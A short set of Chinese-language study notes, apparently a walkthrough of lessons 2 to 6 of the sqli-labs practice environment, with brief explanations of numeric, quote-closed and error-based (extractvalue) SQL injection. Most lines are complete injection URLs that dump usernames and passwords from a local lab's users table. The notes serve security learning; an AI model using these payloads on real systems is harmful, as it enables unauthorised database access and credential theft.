lesson2

第一课是字符注入，就是php给他加了引号变成了字符
这一个是数值型注入，不需要添加引号, 其他的都一样
http://192.168.154.131/sqli/Less-2/?id=1--
http://192.168.154.131/sqli/Less-2/?id=1 union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

lesson2.png

lesson3

使用')闭合
http://192.168.154.131/sqli/Less-3/?id=1') union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

lesson3.png

lesson4

使用") 闭合
http://192.168.154.131/sqli/Less-4/?id=1") union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

lesson4.png

lesson5

这里没有回显，只能使用报错注入
http://192.168.154.131/sqli/Less-5/?id=1' and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users))) --

lesson5.png

但这里显示有限，得多几次显示
http://192.168.154.131/sqli/Less-5/?id=1' and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users where username not in ('Dumb', 'Angelina')))) --

lesson6

双引号报错注入
http://192.168.154.131/sqli/Less-6/?id=1" and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users))) --

lesson6.png

部分笔记

图片.png

完整笔记等通关就放出来